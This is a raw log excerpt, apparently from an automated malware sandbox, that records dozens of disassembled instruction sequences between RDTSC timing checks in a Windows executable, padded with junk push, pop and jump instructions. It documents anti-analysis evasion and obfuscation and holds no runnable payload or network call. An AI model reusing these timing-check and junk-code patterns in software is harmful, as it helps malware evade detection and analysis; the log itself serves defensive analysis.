Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 723194 second address: 723198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 723198 second address: 7231A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7231A6 second address: 7231AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7231AD second address: 7231CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FC350C3E716h 0x00000009 jmp 00007FC350C3E721h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 723324 second address: 72333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a pop edx 0x0000000b jmp 00007FC3507E5380h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72333F second address: 72335A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E727h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72335A second address: 72335E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72BFA4 second address: 72BFAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72BFAB second address: 72BFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FC3507E537Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A619 second address: 72A62C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC350C3E71Eh 0x00000008 jno 00007FC350C3E716h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A62C second address: 72A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC3507E5376h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A79E second address: 72A7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC350C3E716h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A7AD second address: 72A7CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5387h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A8FE second address: 72A953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jp 00007FC350C3E716h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC350C3E71Fh 0x0000001a popad 0x0000001b popad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC350C3E722h 0x00000024 jl 00007FC350C3E716h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72A953 second address: 72A95D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC3507E5376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72AA85 second address: 72AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FC350C3E71Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d js 00007FC350C3E716h 0x00000013 jnp 00007FC350C3E718h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FC350C3E722h 0x00000022 push edx 0x00000023 jnp 00007FC350C3E716h 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC350C3E728h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72ADA1 second address: 72ADC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC3507E5382h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC3507E537Ah 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72AF30 second address: 72AF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push esi 0x00000008 jmp 00007FC350C3E71Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72B68B second address: 72B6B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC3507E537Fh 0x0000000e je 00007FC3507E5376h 0x00000014 pushad 0x00000015 popad 0x00000016 je 00007FC3507E5376h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72B6B2 second address: 72B6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 72B6BA second address: 72B6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7338A7 second address: 7338AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7338AB second address: 7338BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FC3507E5376h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7338BD second address: 7338C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7338C1 second address: 7338D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FC3507E5376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jc 00007FC3507E53B9h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7338D7 second address: 733907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E729h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E720h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 733A76 second address: 733A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 733A7A second address: 733A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 733C09 second address: 733C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5383h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 73FBFE second address: 73FC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 73FC04 second address: 73FC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 je 00007FC3507E5376h 0x0000000c jmp 00007FC3507E5381h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 74F605 second address: 74F613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 74F613 second address: 74F617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 74F617 second address: 74F61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 74F61B second address: 74F673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5386h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c ja 00007FC3507E5376h 0x00000012 jp 00007FC3507E5376h 0x00000018 pop edx 0x00000019 jng 00007FC3507E5383h 0x0000001f jmp 00007FC3507E537Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC3507E5387h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 74F673 second address: 74F679 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 67857A second address: 678581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 678581 second address: 67858A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 67858A second address: 67858E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 75701D second address: 75705C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC350C3E71Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC350C3E729h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 75B613 second address: 75B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 75B617 second address: 75B638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC350C3E725h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 75B799 second address: 75B7A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC3507E5376h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 75BA6C second address: 75BA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7605BB second address: 7605DB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC3507E5388h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7601C9 second address: 7601CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7601CF second address: 7601D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 76BFB1 second address: 76BFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 76BFB7 second address: 76BFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 76BFBB second address: 76BFC1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 76BFC1 second address: 76BFF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3507E5386h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 76BFF7 second address: 76BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 77E85B second address: 77E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 77E85F second address: 77E863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79A4D8 second address: 79A4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5383h 0x00000009 ja 00007FC3507E537Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79A4FB second address: 79A500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7994E2 second address: 7994E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7997F1 second address: 7997F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7997F5 second address: 799818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3507E5387h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799818 second address: 79981C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799974 second address: 79997C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79997C second address: 799982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799DC4 second address: 799DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799DC8 second address: 799DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E721h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC350C3E728h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799DFB second address: 799E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5385h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799E15 second address: 799E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC350C3E727h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC350C3E71Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799E43 second address: 799E4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 799F8F second address: 799F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79D13E second address: 79D143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79D143 second address: 79D14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79D14B second address: 79D163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC3507E537Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 79D163 second address: 79D169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7A2D14 second address: 7A2D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7A2D18 second address: 7A2D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 7A2D1C second address: 7A2D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D0053 second address: 54D0085 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E729h 0x00000012 jmp 00007FC350C3E71Bh 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D0085 second address: 54D00C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E5388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FC3507E5380h 0x00000011 xor eax, 56B42A58h 0x00000017 jmp 00007FC3507E537Bh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54D00C6 second address: 54D0105 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC350C3E727h 0x00000011 pop esi 0x00000012 call 00007FC350C3E729h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54900C9 second address: 5490138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC3507E5383h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC3507E537Bh 0x0000001b jmp 00007FC3507E5383h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FC3507E5388h 0x00000027 and esi, 09EE1B38h 0x0000002d jmp 00007FC3507E537Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0991 second address: 54B0997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0997 second address: 54B099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B099B second address: 54B099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0551 second address: 54B0555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0555 second address: 54B0572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0572 second address: 54B05AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov edx, 719C99DEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FC3507E5382h 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3507E5387h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0253 second address: 54B0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0259 second address: 54B025D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0F47 second address: 54B0F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC350C3E71Ch 0x00000012 xor al, 00000008h 0x00000015 jmp 00007FC350C3E71Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 54B0F87 second address: 54B0FD8 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b call 00007FC3507E5383h 0x00000010 pop eax 0x00000011 pushfd 0x00000012 jmp 00007FC3507E5389h 0x00000017 add si, ED86h 0x0000001c jmp 00007FC3507E5381h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 55004E3 second address: 5500508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 5500508 second address: 550050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 550050E second address: 5500512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe RDTSC instruction interceptor: First address: 5500512 second address: 5500516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
